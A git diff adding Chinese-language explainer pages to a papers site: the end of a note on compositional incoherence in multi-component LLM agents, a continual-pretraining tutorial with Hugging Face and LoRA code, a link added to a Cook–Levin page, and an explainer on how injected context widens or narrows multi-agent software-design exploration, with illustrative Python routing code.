case**。论文证明:仅监控各模块输出无法检测此类失败——必须在**组合层**计算 $\varepsilon^{\star}$ 或做 $\Pi^{\star}$ 修复。 + +--- + +## 局限与开放问题(论文 §6 摘要) + +- 耦合集 $\mathcal{C}$ 需**显式声明**;从 agent transcript **隐式恢复** $\mathcal{C}$ 仍开放 +- 层次投影保证几何/Brier 改进,但若真实标签 $p^{\star}\notin\mathcal{M}^{\star}$(标注与逻辑结构不一致),预测增益可能反转(Cor 3.7) +- Abstain 阈值 $\tau$ 与预算化 exposure 的校准未完全解决 + +--- + +## 一句话带走 + +> **多组件 LLM Agent 的失败模式之一:每个部件Locally 看起来是合法概率,拼起来却违反联合逻辑;$\varepsilon^{\star}$ 是可运行时计算的「系统级不一致证书」,Boyle–Dykstra 投影给出确定性修复——这不是 prompt 工程能替代的结构问题。** + +--- + +## 延伸阅读 + +- 论文 HTML:[arXiv:2605.30335](https://arxiv.org/html/2605.30335v1) +- 作者代码仓库:[akotawala10/composition-incoherence-icml](https://github.com/akotawala10/composition-incoherence-icml) +- 相关 benchmark 数据:Paleka et al. (2025) ensemble cliques;Polymarket partition 场景 +- 凸投影理论:Bauschke & Combettes (2017);Boyle–Dykstra (1986) +- 一致性哲学基础:de Finetti (1937) Dutch book / FTAP + +--- + +## BibTeX + +```bibtex +@misc{kotawala2026lcgi, + title = {Locally Coherent, Globally Incoherent: Bounding Compositional Incoherence in Multi-Component LLM Agents}, + author = {Kotawala, Anany}, + year = {2026}, + eprint = {2605.30335}, + archivePrefix = {arXiv}, + primaryClass = {cs.LG}, + url = {https://arxiv.org/abs/2605.30335} +} +``` diff --git a/src/content/docs/papers/continual-pretrain-survey-2026.md b/src/content/docs/papers/continual-pretrain-survey-2026.md new file mode 100644 index 000000000..457756e8a --- /dev/null +++ b/src/content/docs/papers/continual-pretrain-survey-2026.md @@ -0,0 +1,348 @@ +--- +title: Continual Pretraining — 让大模型"活到老,学到老" +来源: https://arxiv.org/abs/2402.01364 +日期: 2026-06-13 +分类: 机器学习 +子分类: 模型与训练 +难度: 入门 +provenance: pipeline-v3 +--- + +> **说明**:用户提供的 arXiv ID 2605.30765 实际对应一篇量子物理论文,与"Continual Pretraining"无关。本文基于该主题最相关的综述论文 arXiv:2402.01364 *Continual Learning for Large Language Models: A Survey*(Wu et al., 2024)以及多篇核心研究撰写,覆盖 Continual Pretraining 的完整知识体系。 + +## 是什么 + +**Continual Pretraining(持续预训练,简称 CPT)** 是在一个已经训练好的大语言模型(LLM)基础上,**继续喂新数据做预训练**,让模型"边活边学",而不是每次学新知识都从零训练或者只靠外挂检索。 + +日常类比: + +- **传统预训练** = 一个学生读完了大学本科(4 年),毕业了。之后再想知道新东西,只能课外自学(检索增强 / RAG),或者重新考研(全量重新训练)。 +- **Continual Pretraining** = 这个学生边工作边读在职研究生,继续上课、做研究,**原来的知识没丢,还学了新的**。 + +一句话:CPT 就是用**新的语料**对一个**已有的预训练模型**再做几轮自监督训练,让它掌握新事实、新领域或新语言。 + +## 为什么重要 + +不理解 CPT,下面这些事都没法解释: + +- 为什么 GPT-4 的"知识截止日期"是 2023 年——因为它的预训练数据停在那儿,之后发生的事它不知道 +- 为什么每个行业都想把自己的"医疗版 / 法律版 / 金融版 LLaMA"做出来——通用模型不够专精,CPT 是最低成本的领域适配方式 +- 为什么 RAG 不能完全替代 CPT:RAG 只能补事实,CPT 能补领域语言风格、术语体系,甚至推理模式 +- 为什么模型越大越适合 CPT:大模型有更强的"记忆弹性",学新东西时不容易把旧的忘光 + +## 核心概念 + +### 1. 三阶段学习框架 + +LLM 的完整训练分三阶段,CPT 发生在第一阶段: + +``` +初始化权重(随机) + | + v +┌─────────────────────┐ +│ ① 初始预训练 (PT) │ ← 从海量无标注文本学语言 +│ (基础大模型诞生) │ +└─────────────────────┘ + | + v +┌─────────────────────┐ +│ ② 持续预训练 (CPT) │ ← 用新数据继续学(本文主题) +│ "活到老学到老" │ +└─────────────────────┘ + | + v +┌─────────────────────┐ +│ ③ 指令微调 (SFT) │ ← 学怎么听话办事 +│ Alignment / RLHF │ ← 学价值观对齐 +└─────────────────────┘ +``` + +CPT 的核心问题:**模型学新东西的时候,怎么不把旧的东西忘光?** 这个问题叫"灾难性遗忘"(Catastrophic Forgetting)。 + +### 2. 灾难性遗忘 + +神经网络在学新任务时,参数会剧烈调整,导致旧知识的表示被"覆盖"。 + +类比:你英文很好,后来去学法语。学得越用力,英文反而越生疏——这就是遗忘。 + +### 3. 三种 CPT 方向 + +| 方向 | 目标 | 例子 | +|------|------|------| +| 更新事实 | 跟上时事 / 新知识 | 用最新维基百科更新模型 | +| 更新领域 | 让通用模型变专家 | 让 LLaMA 变成医疗 LLaMA | +| 扩展语言 | 增加新语言支持 | 让英语模型学会中文 | + +## 代码示例 + +### 示例 1:最基本的 CPT 流程(PyTorch + Hugging Face) + +```python +from transformers import AutoModelForCausalLM, AutoTokenizer, TrainingArguments, Trainer +from datasets import load_dataset + +# 1. 加载已有的基础模型(例如 LLaMA-2-7B) +model_name = "meta-llama/Llama-2-7b-hf" +model = AutoModelForCausalLM.from_pretrained(model_name) +tokenizer = AutoTokenizer.from_pretrained(model_name) + +# 2. 加载新语料——这里用最新的维基百科数据做例子 +dataset = load_dataset("wikipedia", "20231201.en", split="train") + +# 3. 对文本做 tokenize,切分成固定长度的句子块 +MAX_LENGTH = 512 + +def tokenize(example): + return tokenizer( + example["text"], + truncation=True, + max_length=MAX_LENGTH, + return_overflowing_tokens=True, + stride=128, # 重叠 128 个 token,避免切分处信息丢失 + ) + +tokenized_dataset = dataset.map(tokenize, batched=True) +tokenized_dataset = tokenized_dataset.filter(lambda x: x["input_ids"] is not None) + +# 4. 定义训练参数 +training_args = TrainingArguments( + output_dir="./continual-pretrained-model", + learning_rate=1e-5, # CPT 的 lr 通常比从头训练小很多 + num_train_epochs=3, # 通常 1-3 轮就够了,学太多会过拟合 + per_device_train_batch_size=16, + gradient_accumulation_steps=4, + warmup_ratio=0.05, # 少量 warmup + logging_steps=100, + save_strategy="epoch", + fp16=True, # 混合精度训练 +) + +# 5. 启动持续预训练 +trainer = Trainer( + model=model, + args=training_args, + train_dataset=tokenized_dataset, +) + +trainer.train() +trainer.save_model("./continual-pretrained-model") +``` + +关键点: +- **学习率要小**(1e-5 ~ 5e-5),比从头预训练小一个数量级——太大容易覆盖旧知识 +- **训练轮次要少**(1-3 epoch)——多训不如早停 +- **重叠切分(stride)**很重要——句子不会恰好从边界断掉 + +### 示例 2:用 LoRA 做参数高效的 CPT + +全量微调 7B 模型需要约 28GB GPU 显存(参数本身就占 14B × 4 bytes × 2 for Adam optimizer)。**LoRA** 只训练少量参数,大幅降低成本: + +```python +from peft import LoraConfig, get_peft_model + +# 1. 加载基础模型(同上) +model = AutoModelForCausalLM.from_pretrained(model_name) + +# 2. 注入 LoRA 适配器 +lora_config = LoraConfig( + r=16, # LoRA 的秩——越大表达力越强,但参数也越多 + lora_alpha=32, # 缩放因子,通常设为 r 的 2 倍 + target_modules=[ # 对哪些层打 LoRA 补丁 + "q_proj", # Q 矩阵(注意力查询) + "k_proj", # K 矩阵(注意力键) + "v_proj", # V 矩阵(注意力值) + "out_proj", # 注意力输出投影 + "fc_in", # MLP 的前馈层 + "fc_out", # MLP 的输出层 + ], + lora_dropout=0.05, # 小 dropout 防过拟合 + bias="none", # 偏置项不训练 + task_type="CAUSAL_LM", +) + +model = get_peft_model(model, lora_config) + +# 3. 打印一下可训练参数比例——通常只有 0.1%~1% +model.print_trainable_parameters() +# 例如: trainable params: 8,388,608 || all params: 6,738,012,672 || 0.12% + +# 4. 训练(用上面的 Trainer 即可,不需要改) +trainer = Trainer( + model=model, + args=training_args, + train_dataset=tokenized_dataset, +) + +trainer.train() + +# 5. 合并 LoRA 权重并保存(可选——不合并也可以直接用) +model = model.merge_and_unload() +model.save_pretrained("./lora-continual-pretrained-model") +``` + +为什么 LoRA 适合 CPT? +- **参数少 = 遗忘少**:只动 0.1% 的参数,旧知识被改动的幅度自然小 +- **可切换**:不同领域的 LoRA 适配器可以插拔,一个基座模型配多个领域适配器 + +### 示例 3:数据混合策略——防止遗忘的关键 trick + +只用新数据训练 = 高遗忘风险。业界常用"新旧混合"策略: + +```python +# 数据混合比例实验(来自多项 CPT 研究) + +# 方案 A:纯新数据(遗忘最严重,但新知识学得最快) +# new_data_ratio = 1.0 + +# 方案 B:90% 新 + 10% 旧(业界最常用,遗忘和学习的平衡点) +# new_data_ratio = 0.9 + +# 方案 C:50% 新 + 50% 旧(遗忘最少,但新知识学得慢) +# new_data_ratio = 0.5 + +# 实现混合: +def build_mixed_dataset(new_dataset, old_dataset, new_ratio=0.9): + """ + 按 new_ratio 混合新旧数据集。 + old_dataset 通常是原始预训练数据的一个子集(没必要全量)。 + """ + # 权重采样:新数据被抽到的概率 = new_ratio + from datasets import concatenate_datasets, Dataset + + # 简单做法:拼接后 shuffle + old_subset = old_dataset.shuffle(seed=42).select(range(len(new_dataset) * (1 - new_ratio) // (new_ratio or 1e-9))) + mixed = concatenate_datasets([new_dataset, old_subset]) + return mixed.shuffle(seed=42) + +# 更高级的做法:按"知识领域"加权—— +# 通用知识(语法、常识)用旧数据保持 +# 领域知识(新闻、论文)用新数据更新 +# 这相当于给不同知识类型不同的"遗忘保护" +``` + +## 踩过的坑 + +### 坑 1:学习率设太大 = 遗忘加速器 + +``` +从头预训练: lr = 3e-4 ~ 6e-4 +CPT 微调: lr = 1e-5 ~ 5e-5 ← 必须小 +``` + +原因:从头训练时参数在"找"大方向;CPT 时参数已经在好位置附近,大步走就直接跨出去了。 + +经验法则:CPT 的学习率 = 从头预训练学习率 × 0.05 ~ 0.1。 + +### 坑 2:训练轮次越多越好 = 错的 + +``` +从头预训练: 通常训练 100B-300B tokens,可能跨数周 +CPT: 通常训练 5B-50B tokens,几天到一周 +``` + +过度训练 CPT 的后果: +- 模型"过度适应"新数据,在新数据上表现得很好,但在通用任务上退化 +- 新数据的分布通常不够多样(比如只有维基百科),多训会过拟合 + +### 坑 3:数据质量比数据量重要得多 + +CPT 的教训:**脏数据 × CPT = 垃圾进,更快垃圾出。** + +- 原始预训练的数据是人工筛选过的(Common Crawl → 清洗 → 去重 → 质量过滤) +- 如果你直接用"爬回来的网页"做 CPT,效果往往不如先用干净数据 +- 一条高质量新闻 > 100 条低质量网页 + +### 坑 4:词汇表不匹配 + +换了新语言或新领域后,**tokenizer 的词汇表可能不认识新词**: + +```python +# 问题:中文词汇在新tokenizer里被拆成碎片 +# "人工智能" → ["人", "工", "智", "能"] → 4 个 token +# 而不是一个 token → 信息密度下降,训练效率降低 + +# 解决:扩展 tokenizer +from tokenizers import Tokenizer +from tokenizers.models import BPE +from tokenizers.trainers import BpeTrainer + +# 用新语料重新训练 tokenizer,保留原有词表 +tokenizer = AutoTokenizer.from_pretrained(model_name) +new_tokens = ["人工智能", "大语言模型", ...] # 领域术语 +tokenizer.add_tokens(new_tokens) +# ⚠️ 加完 token 后,需要重新初始化它们的 embedding,并小心训练 +``` + +### 坑 5:跨阶段遗忘 + +CPT 如果发生在指令微调之后: + +``` +PT → CPT → SFT → Alignment ← 正常流程 + +PT → SFT → CPT(在指令微调后的模型上继续预训练) + ↓ + 指令跟随能力下降! ← 跨阶段遗忘 +``` + +原因:指令微调改变了模型的"行为模式"(从"补全句子"变成"回答问题"),再回到自监督预训练会"忘记怎么听话"。 + +解决方案:在 CPT 数据里掺入一部分指令数据。 + +### 坑 6:评估指标选不对 + +| 指标 | 公式 | 含义 | +|------|------|------| +| 困惑度 (PPL) | exp(-平均 log prob) | CPT 时最常用的训练指标——越低越好 | +| BWT(向后转移率) | avg(新模型在旧任务上的性能 - 旧模型在旧任务上的性能) | 负值 = 有遗忘,越接近 0 越好 | +| FWT(向前转移率) | avg(新模型在新任务上的初始性能 - 随机初始化在旧任务上的性能) | 正值 = 旧知识帮助了新任务 | + +很多人只看 PPL,忽略了 BWT。**PPL 下降了 10% 但 BWT 是 -0.3,说明模型学了新东西但丢了旧东西——得不偿失。** + +## 不同规模的模型,CPT 效果差异很大 + +研究(Yıldız et al., 2024, arXiv:2402.17400)发现: + +- **< 1.5B 的小模型**:CPT 提升显著,是最受益的群体。因为小模型在预训练时学不完所有知识,CPT 能补 +- **7B+ 的大模型**:CPT 仍然有效,但边际收益递减。大模型本身已经"学了很多",CPT 主要补的是领域知识 +- **关键发现**:大模型在 CPT 时遗忘更慢。同样的训练强度下,LLaMA-7B 遗忘率远低于 GPT-2 (125M) + +## 相关技术对比 + +| 技术 | 更新什么 | 要不要改模型参数 | 成本 | +|------|----------|-----------------|------| +| **CPT(本文)** | 语言理解 / 知识 / 领域 | 改 | 高 | +| RAG | 事实知识 | 不改 | 低 | +| 指令微调 (SFT) | 任务行为 | 改 | 中 | +| 模型编辑 | 特定事实 | 改少量 | 低 | + +核心区别:CPT 是唯一能改变模型**语言理解能力**和**领域适配度**的方法。RAG 只能在外围补充知识。 + +## 读到什么 + +1. **固定权重的模型 = 时间胶囊**——预训练完成的那一刻,模型就被"冻结"在那个时间点。CPT 是打破这种冻结的方式。 + +2. **遗忘不是故障,是学习的代价**——神经网络本质上是在参数空间里找一个新的最优解。这个过程中旧知识被覆盖是物理规律,不是 bug。关键是用混合数据、小学习率、LoRA 等手段来减轻。 + +3. **CPT 不是万能药**——它不能让你的模型突然学会它语言里本来没有的语法结构,也不能让它突然理解它从未接触过的推理模式。它最适合"增量式"的知识更新。 + +4. **数据管道比模型架构更重要**——一个精心构建的 CPT 数据管道(清洗→去重→质量过滤→领域标注→混合比例调优)带来的提升,远大于换个更复杂的模型。 + +5. **"活到老学到老"是渐进式的**——CPT 不是一次性的。模型可以每隔几个月做一次小更新,或者按领域持续积累。真正的 LLM 应该是"持续进化"的。 + +## 延伸阅读 + +- 综述论文:[Continual Learning for Large Language Models: A Survey](https://arxiv.org/abs/2402.01364)(Wu et al., 2024)——本文的核心来源 +- 持续预训练基准:[Investigating Continual Pretraining in LLMs](https://arxiv.org/abs/2402.17400)(Yıldız et al., 2024)——不同规模模型的 CPT 对比研究 +- [Recyclable Tuning for Continual Pre-training](https://arxiv.org/abs/2305.08702)(Qin et al., ACL 2023 Findings)——如何回收旧任务的适配权重 +- [Synthetic Continued Pretraining](https://arxiv.org/abs/2409.07431)(Yang et al., 2024)——用小领域数据合成大量预训练数据 +- [RedWhale: Korean LLM via Continual Pretraining](https://arxiv.org/abs/2408.11294)(Vo et al., 2024)——CPT 在低资源语言的实践 + +## 关联 + +- [[指令微调]] —— CPT 之后的第二步:让模型学会听话 +- [[rag]] —— 不靠改参数的知识更新方案,和 CPT 互补 +- [[灾难性遗忘]] —— CPT 要面对的核心难题 +- [[liger-kernel-llm-training]] —— 如果要做 CPT,需要高效的训练框架 +- [[how-lora-remembers]] —— LoRA 在持续学习中的记忆保持机制 diff --git a/src/content/docs/papers/cook-levin.md b/src/content/docs/papers/cook-levin.md index 8dc4c3041..a45c70256 100644 --- a/src/content/docs/papers/cook-levin.md +++ b/src/content/docs/papers/cook-levin.md @@ -166,4 +166,5 @@ Cook-Levin 证明的就是:**SAT 是第一个被发现的 NP-完全问题**。 - [[sweeney-k-anonymity-2002]] —— k-匿名 — 发布数据时让攻击者无法锁定你是谁 - [[turing-1936]] —— Turing 1936 可计算性 - [[zk-snark]] —— zk-SNARK 零知识证明 +- [[zk-snark-pinocchio-2013]] —— Pinocchio 2013 — 首个「近乎实用」的可验证计算与 zk-SNARK 工程系统 diff --git a/src/content/docs/papers/crossover-context-multi-agent.md b/src/content/docs/papers/crossover-context-multi-agent.md new file mode 100644 index 000000000..f6d0d5646 --- /dev/null +++ b/src/content/docs/papers/crossover-context-multi-agent.md @@ -0,0 +1,439 @@ +--- +title: When Context Hurts — 知识迁移在多智能体设计中的交叉效应 +来源: 'Saranyan Vigraham, "When Context Hurts: The Crossover Effect of Knowledge Transfer on Multi-Agent Design Exploration", arXiv:2605.04361, Meta, 2026' +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:给新同事「交接文档」,有时救命,有时添堵 + +想象你带一个新团队做系统架构评审。上一组人已经讨论过两周,留下了一堆材料: + +- **完整会议录音**(Transcript):吵了三个小时,有人主张 Kafka,有人坚持 Redis Stream,最后也没拍板。 +- **设计文档**(Design Doc):漂亮地写定了「用中心化协调器 + Worker 轮询」。 +- **反模式清单**(Anti-patterns):只记录「我们否决了什么」——别用 cron 硬轮询、别在 DB 里存任务状态。 +- **上一版代码**(Code):能跑,但没人解释为什么选这个库。 + +直觉会说:**材料越相关、越完整,新团队越好**。Vigraham(arXiv:2605.04361,Meta)用 2,700+ 次多智能体实验告诉你:**同一份材料,在不同任务上效果可以完全相反**——这叫 **crossover effect(交叉效应)**。 + +- 做 **限流器(rate limiter)** 设计时,没给任何上下文,团队几乎只聊「令牌桶」一种方案,**权衡覆盖率仅 3.3%**。塞进去反模式文档后,覆盖率飙到 **70%**(约 **20×**)。 +- 做 **Kubernetes Operator** 设计时,团队本来就会主动讨论多种框架与调和策略,**基线覆盖率 47.5%**。塞进去完整会议记录后,覆盖率掉到 **25.6%**(**−46%**)。 + +更离谱的是:在若干任务上,**一篇完全无关的技术文档**,表现竟优于所有「相关」知识工件。 + +所以这篇论文挑战的不是「要不要用上下文」,而是行业默认假设:**上下文越多越好、越相关越好**——对**设计探索**(design exploration)而言,这并不成立。 + +--- + +## 是什么 + +**研究问题**:把 A 组多智能体做软件设计时产出的**知识工件(knowledge artifacts)**,注入给 B 组解决**同一设计题**,会扩大还是缩小 B 组的**设计空间探索**? + +**实验规模**: + +| 维度 | 设置 | +|------|------| +| 任务 | 10 个软件设计题(5 个通用 CS + 5 个领域专用) | +| 上下文条件 | 7 种工件注入方式 | +| 重复 | 每格 20 次独立试验 | +| 总运行 | 2,700+ 次多智能体商议 | +| 模型 | Claude Sonnet 4,5 个不同人设 Agent,SA(Speed + Autonomy)编排 | + +**核心指标:权衡覆盖率(tradeoff coverage)** + +对每个任务预先列出已知架构权衡(如限流器有 6 项:算法选择、自建 vs 复用、部署模型……)。评估用另一个 LLM 读完整商议记录,判断「这项权衡是否被讨论过」: + +\[ +\text{Coverage} = \frac{\text{被讨论的已知权衡数}}{\text{该任务已知权衡总数}} +\] + +这和「代码能不能跑、测试过不过」正交:团队可以写出正确实现,却只探索了设计空间里极小一角。 + +--- + +## 为什么重要 + +### 1. 代码生成 ≠ 软件设计 + +给函数签名和类型,上下文几乎总是帮**实现**(Chen et al., 2021)。但**设计**要在多个可行方案间权衡——此时上下文可能**锚定(anchor)**团队,反而减少探索。 + +### 2. 多智能体编排的默认策略可能帮倒忙 + +RAG、长上下文、把上一轮的 design doc / transcript 全塞进 prompt——若不做任务级诊断,你可能在**已经会探索的任务**上注入「毒药」,在**只会抄标准答案的任务**上却错过救命稻草。 + +### 3. 给出可操作的廉价诊断 + +论文主张:先跑**一次无上下文试验**,测 **baseline exploration(基线探索度)**,即可较强预测后续注入是否有益(Pearson **r = −0.82**, *p* < 0.001)。基线越低,知识工件越可能**打断错误收敛**;基线越高,工件越可能**有害锚定**。 + +--- + +## 核心概念 + +### 1. 交叉效应(Crossover Effect) + +**同一类知识工件**,在任务 A 上大幅提升覆盖率,在任务 B 上显著降低——不是随机噪声,而是与任务的**基线探索度**系统性相关。 + +典型数字(相对基线的 Δ coverage): + +| 任务 | 基线 | 反模式文档 Δ | 商议记录 Δ | +|------|------|-------------|-----------| +| Rate limiter | 0.033 | **+0.667** | **+0.558** | +| K8s operator | 0.475 | −0.044 | **−0.219** | + +### 2. 基线探索度(Baseline Exploration) + +**无注入上下文(C6 对照)**时,团队自然达到的权衡覆盖率。 + +- **极低(≈0.03)**:Rate limiter——训练数据里有强烈「令牌桶」先验,团队几乎不讨论滑动窗口、分布式计数等替代方案。 +- **较高(≈0.54)**:LRU cache——OrderedDict vs 双向链表+哈希、线程安全、写策略等**没有单一标准答案**,团队会自发探索。 + +基线探索度是**预测变量**:越低,注入越可能帮忙;越高,注入越可能伤害。 + +### 3. 七种知识工件条件 + +| ID | 条件 | 含义 | +|----|------|------| +| C1 | Transcript | 种子组 5 个 Agent 完整、未剪辑的商议记录 | +| C2 | Topology | 提取的权衡列表:命名决策、选项与理由 | +| C3 | Design doc | LLM 润色后的设计文档 | +| C4 | Anti-patterns | **仅**被否决的备选方案 | +| C5 | Code | 种子组最终代码,无推理过程 | +| C6 | Baseline | 不注入(对照) | +| C7 | Irrelevant | 无关技术文档(启动/干扰对照) | + +注入方式统一为附录:「前一个团队做过这道题,以下是他们的 [工件类型]:……」 + +### 4. 锚定的双重角色(Anchoring as Dual Force) + +与心理学**锚定偏差**类比,但在 LLM 多智能体设计里呈现**两面**: + +1. **低基线(自然收敛)**:模型被训练先验锁在「标准解」。工件充当**反锚**——尤其是反模式(「别这么做」暗示「这么做存在」),迫使重新权衡。 +2. **高基线(已在探索)**:团队本就会比较多种方案。工件变成**正锚**——尤其 Code(完整实现)和 Transcript(具体辩论框架),把讨论锁进某一叙事。 + +**无关文档**有时最优:提供轻微「干扰」打破默认先验,却**不**带入内容级锚定——在 ML 训练流水线等任务上,无关文档比 Transcript 还好。 + +### 5. 自然收敛 vs 诱导收敛(Natural vs Induced Convergence) + +Phase 3 通过**提示词强度**操纵收敛压力四档:开放题 → 点名标准做法 → 强制遵循 → 给代码骨架。 + +- **自然收敛**:来自训练数据先验(如 rate limiter 默认令牌桶)→ **对工件扰动敏感**,反模式/记录能拉开探索。 +- **诱导收敛**:提示词已写明「必须用中心化协调器」→ 探索已被压扁 → **工件几乎救不回来**。 + +启示:若你的 prompt 已经「诱导收敛」,别指望再塞 design doc 能恢复探索广度。 + +### 6. 直接评估(Direct Evaluation) + +用评估 LLM 对每条已知权衡做二元判断 + 证据引用,并允许记录**新颖权衡**(不在清单里但合理的设计张力)。避免「实现正确但探索贫瘠」被传统指标掩盖。 + +--- + +## 机制直觉:一张图看懂 + +```text + 基线探索度 (无上下文时的 coverage) + 低 (≈0.03) 高 (≈0.5+) + │ │ + 训练先验 │ 团队 stuck 在「标准答案」 │ 团队已在多方案间权衡 + 主导收敛 │ │ + ▼ ▼ + 注入上下文 │ 反锚 / 扰动 → 覆盖率↑↑ │ 正锚 / 锁定叙事 → 覆盖率↓↓ + │ 反模式、Transcript 效果最好 │ Code、Transcript 伤害最大 + │ │ + 实践建议 │ 积极注入相关工件 │ 少注入或只注入反模式 + │ 甚至无关文档也有帮助 │ 无关文档有时优于相关工件 +``` + +**廉价诊断流程**:`无上下文跑 1 次 → 算 coverage → 若 < 0.1 大胆注入,若 > 0.3 谨慎,若 > 0.5 默认不注入`。 + +--- + +## 代码示例 1:度量基线探索度并决定是否注入上下文 + +下面用 Python 模拟论文的**诊断门控(gating)**逻辑:先跑 baseline trial,再根据阈值选择注入策略。 + +```python +from dataclasses import dataclass +from enum import Enum +from typing import Optional + + +class ArtifactKind(Enum): + NONE = "baseline" + TRANSCRIPT = "transcript" + TOPOLOGY = "topology" + DESIGN_DOC = "design_doc" + ANTI_PATTERNS = "anti_patterns" + CODE = "code" + IRRELEVANT = "irrelevant" + + +@dataclass +class DesignTask: + slug: str + known_tradeoffs: int # 该任务预先列出的权衡项数量 + + +@dataclass +class DeliberationResult: + discussed_tradeoffs: set[str] + novel_tradeoffs: set[str] + + @property + def coverage(self, known: int) -> float: + return len(self.discussed_tradeoffs) / known + + +# 论文经验阈值(arXiv:2605.04361 §4.8) +LOW_BASELINE = 0.10 # 以下:工件通常大幅帮忙 +MID_BASELINE = 0.30 # 以上:最佳工件收益趋近于零 +HIGH_BASELINE = 0.50 # 以上:注入多半有害 + + +def recommend_artifact(baseline_coverage: float) -> ArtifactKind: + """根据无上下文基线,推荐是否/如何注入知识工件。""" + if baseline_coverage < LOW_BASELINE: + # 收敛型任务:反模式扰动最强且负效应最小(Table 4) + return ArtifactKind.ANTI_PATTERNS + if baseline_coverage < MID_BASELINE: + # 中等基线:拓扑清单有时有效,避免完整代码锚定 + return ArtifactKind.TOPOLOGY + if baseline_coverage < HIGH_BASELINE: + # 探索型:相关工件常有害;无关文档偶尔是「最不差」选项 + return ArtifactKind.IRRELEVANT + # 高探索:默认不注入 + return ArtifactKind.NONE + + +def build_transfer_prompt( + task: DesignTask, + artifact: Optional[str], + kind: ArtifactKind, +) -> str: + base = f"Design task: {task.slug}\nDiscuss architectural tradeoffs before committing." + if kind == ArtifactKind.NONE or artifact is None: + return base + return ( + f"{base}\n\n" + f"A previous team worked on this problem. " + f"Here is their {kind.value}:\n\n{artifact}" + ) + + +# --- 使用示例 --- +task = DesignTask(slug="rate_limiter", known_tradeoffs=6) + +# Phase 1: 无上下文基线(论文每任务 20 次;这里用单次示意) +baseline = DeliberationResult( + discussed_tradeoffs={"algorithm_choice"}, # 6 项里只讨论了 1 项 + novel_tradeoffs=set(), +) +baseline_cov = len(baseline.discussed_tradeoffs) / task.known_tradeoffs # 0.167 + +choice = recommend_artifact(baseline_cov) +prompt = build_transfer_prompt( + task, + artifact="Rejected: naive in-memory counter without TTL cleanup...", + kind=choice, +) +print(f"baseline_coverage={baseline_cov:.3f} -> inject {choice.value}") +# baseline_coverage=0.167 -> inject anti_patterns +``` + +这段代码体现论文最核心的工程建议:**先测量,再注入**——不是「永远 RAG」,而是**条件性知识迁移**。 + +--- + +## 代码示例 2:多智能体编排中的条件性工件路由 + +第二个例子展示如何在 Agent 编排层实现 **crossover-aware router**:同一 `KnowledgeStore` 里存了多种工件,但**按任务基线动态选型**。 + +```python +import asyncio +from typing import Callable, Awaitable, Dict, List + + +AgentFn = Callable[[str], Awaitable[str]] + + +class CrossoverAwareOrchestrator: + """ + 简化版 SA 模式:5 个 Agent 并行商议后合成。 + 注入哪种工件由 baseline_coverage 决定(对应论文 Phase 2)。 + """ + + def __init__( + self, + agents: List[AgentFn], + evaluate_coverage: Callable[[List[str]], float], + knowledge_store: Dict[str, str], + ): + self.agents = agents + self.evaluate_coverage = evaluate_coverage + self.knowledge_store = knowledge_store + + async def run_baseline(self, task_prompt: str, trials: int = 1) -> float: + coverages = [] + for _ in range(trials): + transcripts = await asyncio.gather( + *[agent(task_prompt) for agent in self.agents] + ) + coverages.append(self.evaluate_coverage(transcripts)) + return sum(coverages) / len(coverages) + + def select_artifact_key(self, baseline: float) -> str | None: + if baseline < 0.10: + return "anti_patterns" + if baseline < 0.30: + return "topology" + if baseline < 0.50: + return None # 探索型:论文建议默认不注入相关工件 + return None + + async def run_transfer(self, task_prompt: str) -> dict: + baseline = await self.run_baseline(task_prompt) + key = self.select_artifact_key(baseline) + + if key is None: + transfer_prompt = task_prompt + injected = "none" + else: + appendix = self.knowledge_store[key] + transfer_prompt = ( + f"{task_prompt}\n\n" + f"Previous team artifact ({key}):\n{appendix}" + ) + injected = key + + transfer_transcripts = await asyncio.gather( + *[agent(transfer_prompt) for agent in self.agents] + ) + transfer_cov = self.evaluate_coverage(transfer_transcripts) + + return { + "baseline_coverage": baseline, + "injected_artifact": injected, + "transfer_coverage": transfer_cov, + "delta": transfer_cov - baseline, + } + + +# --- 伪 Agent:演示 K8s operator(高基线)vs rate limiter(低基线)方向相反 --- +async def fake_agent(prompt: str) -> str: + if "rate_limiter" in prompt: + if "anti_patterns" in prompt or "Previous team" in prompt: + return "debate: sliding window vs token bucket vs fixed window" + return "use token bucket" # 低基线:默认收敛 + if "k8s_operator" in prompt: + if "Previous team" in prompt and "transcript" in prompt: + return "follow seed team kubebuilder choice only" + return "compare kubebuilder vs operator-sdk vs raw client-go" + return "generic deliberation" + + +async def main(): + orch = CrossoverAwareOrchestrator( + agents=[fake_agent] * 5, + evaluate_coverage=lambda ts: ( + 0.05 if all("token bucket" in t and "vs" not in t for t in ts) else + 0.45 if any("compare" in t for t in ts) else 0.25 + ), + knowledge_store={ + "anti_patterns": "Do NOT default to token bucket without comparing...", + "topology": "Decision: reconciliation loop vs level-triggered...", + "transcript": "Agent3: we already picked kubebuilder...", + }, + ) + + for slug in ["rate_limiter", "k8s_operator"]: + result = await orch.run_transfer(f"Design a {slug}") + print(slug, result) + +asyncio.run(main()) +``` + +路由器体现了论文对 **MetaGPT / ChatDev 类框架**的隐含批评:若无条件把上一阶段「CEO 文档 / 代码 / 全量 log」塞给下一阶段,你在**高基线任务**上大概率是在**缩小**而非扩大设计空间。 + +--- + +## 实验任务一览(10 题) + +**通用软件工程(训练数据覆盖高)** + +| 任务 | 已知权衡数 | 基线 coverage | +|------|-----------|---------------| +| Rate limiter | 6 | **0.033** | +| LRU cache | 5 | 0.540 | +| Task queue | 6 | 0.308 | +| Pub/sub broker | 8 | 0.281 | +| Distributed scheduler | 10 | 0.310 | + +**领域专用(需专门知识)** + +| 任务 | 已知权衡数 | 基线 coverage | +|------|-----------|---------------| +| Kubernetes operator | 8 | 0.475 | +| Database storage engine | 8 | 0.406 | +| ML training pipeline | 8 | 0.356 | +| Video streaming | 8 | 0.406 | +| Network congestion control | 8 | 0.400 | + +Rate limiter 与 LRU cache 同样「经典」,但前者有**主导默认解**,后者没有——这解释了基线悬殊,而非题目「难不难」。 + +--- + +## 各工件类型的经验法则 + +| 工件 | 收敛型任务(低基线) | 探索型任务(高基线) | 一句话 | +|------|---------------------|---------------------|--------| +| Anti-patterns | **最强增益**(+0.667) | 伤害最小 | 最安全的高收益选项 | +| Transcript | 强增益(+0.558) | **最大伤害**(−0.219) | upside/downside 都最极端 | +| Topology | 中等增益 | 轻微负面 | 结构化权衡清单,锚定弱于全文 | +| Design doc | 中等增益 | 明显负面 | polished 叙事 = 强框架锚定 | +| Code | 中等增益 | 强负面 | 完整实现 = 最强正锚 | +| Irrelevant | 弱增益 | 有时**优于所有相关工件** | 